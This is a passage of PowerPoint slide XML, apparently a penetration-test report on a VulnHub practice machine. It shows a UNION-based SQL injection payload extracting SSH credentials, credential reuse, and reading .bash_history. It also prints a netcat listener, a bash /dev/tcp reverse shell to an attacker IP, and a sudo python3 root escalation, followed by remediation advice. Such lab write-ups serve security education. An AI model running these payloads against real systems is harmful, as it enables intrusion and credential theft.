              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Enumeration of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extracted credentials from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>`ssh` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Example payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> id=' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Credential Reuse Attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SSH login using credentials found in SQLi: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>SSH:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Used for direct remote login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SSH Port Forwarding to access internal services: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>ssh -L 9999:127.0.0.1:9999 jehad@192.168.139.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Local File Inspection (post-SSH):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– discovered internal services and credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`cat /opt/web/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– found remote code execution via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>parameter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16160411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D489B-7501-5B2A-21C6-77BF236B3C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6C4D4A-7783-B948-C4FA-9D590CD8DB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Cont..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30AED40E-3DA5-4927-F90C-CB346027884F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>`):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Used to set up a reverse shell listener: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> 9001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reverse Shell Payload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Bash reverse shell executed via RCE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>     bash -c 'bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>/192.168.139.139/9001 0&gt;&amp;1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Privilege Escalation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Exploited `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>` rights with Python:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>     script -qc "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t> python3 -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>(\"/bin/bash\")'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Flag Capture:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>`cat root.txt` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– post-escalation flag access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Operating System / Platform:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Kali Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– The primary penetration testing platform used throughout the assessment, equipped with pre-installed tools and a secure environment for exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Web Application Testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Burp Suite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>– Used for intercepting, modifying, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> HTTP requests and responses during web application exploitation. Assisted in testing and crafting SQLi payloads for id parameter. Helped verify command injection via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>paramete</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26806571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03856-4E1A-3CCE-508C-4FB7BD538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62091C-3FEF-5770-4D33-D4F86A3899D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>Recommendations:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A0A036F-580C-FAD7-4B9A-BD0396C26656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To strengthen the system's security, all user inputs should be properly validated and sanitized to prevent attacks like SQL injection. Passwords must never be stored in plaintext and should be hashed with secure algorithms such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or Argon2. Reusing credentials across services like SSH and databases should be avoided. SSH access should be limited to trusted IPs, use key-based authentication, and be closely monitored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internal services, such as those on port 9999, must be protected behind authentication and firewalls. The web application should avoid unsafe functions like system() and properly validate command parameters. Sudo permissions should be reviewed to prevent privilege escalation via interpreters like Python. Sensitive files (e.g., flags, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) must have strict permissions, and regular audits should be performed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable logging and monitoring for SSH, web activity, and file access, and use tools like fail2ban or SIEM for alerts. Lastly, conduct regular vulnerability assessments and ensure developers and admins follow secure practices. These measures will reduce risks and help prevent future exploitation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140871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31364-005D-7995-BB7F-E9B61579B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D1AB30-5270-800A-B433-36B655F0C678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B50BE3-5535-15A4-5156-5503332790E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="706669" y="1003852"/>
            <a:ext cx="10778662" cy="2708890"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3842502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23DB2-6BCA-1B59-4382-E53CC2A39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3F625-5E89-1A47-6000-A9FCF43CB030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89171CC1-A2FD-8323-9F63-63212599A06F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The penetration testing exercise revealed several critical security flaws in the target system, demonstrating a full attack chain from external enumeration to internal system compromise. Vulnerabilities such as SQL injection enabled attackers to extract sensitive information from the backend database, including plaintext credentials. These leaked credentials were reused to gain unauthorized SSH access, exposing the risks of poor credential management and reuse across services. The presence of an unprotected internal web service running on port 9999, combined with remote code execution via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> input, allowed for a reverse shell to be established — furthering the level of system control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, privilege escalation was achieved using misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> permissions, granting root access through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> python3. The disclosure of the system flag due to weak file permissions highlighted the lack of basic access control over sensitive resources. These vulnerabilities collectively demonstrate weaknesses in multiple layers of security, including input validation, access control, privilege management, and secure service configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The findings emphasize the importance of defense-in-depth: combining secure coding practices, proper user and permission management, firewall configurations, regular patching, and proactive monitoring. If left unaddressed, such weaknesses can lead to complete system takeover, data loss, and persistent backdoors. Immediate remediation and adoption of best practices are strongly advised to safeguard the environment against both opportunistic and targeted threats.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="663562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EBE01-8F3D-EF8A-A7D4-9F1E4151E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1F82C-4B2A-1AB2-7A3A-49C9FB6A5875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>References </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E68378C4-FF9A-50D3-5FC9-DB62FDC9FDD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11718235" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>VulnHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> – Vulnerable Machines for Practice: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.vulnhub.com](https://www.vulnhub.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>OWASP SQL Injection Guide:                                                                                                                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/SQL\_Injection](https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>GTFOBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> – Sudo Privilege Escalation via Python: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://gtfobins.github.io/gtfobins/python/](https://gtfobins.github.io/gtfobins/python/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Reverse Shell Cheat Sheet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>HighOn.Coffee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>):                                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
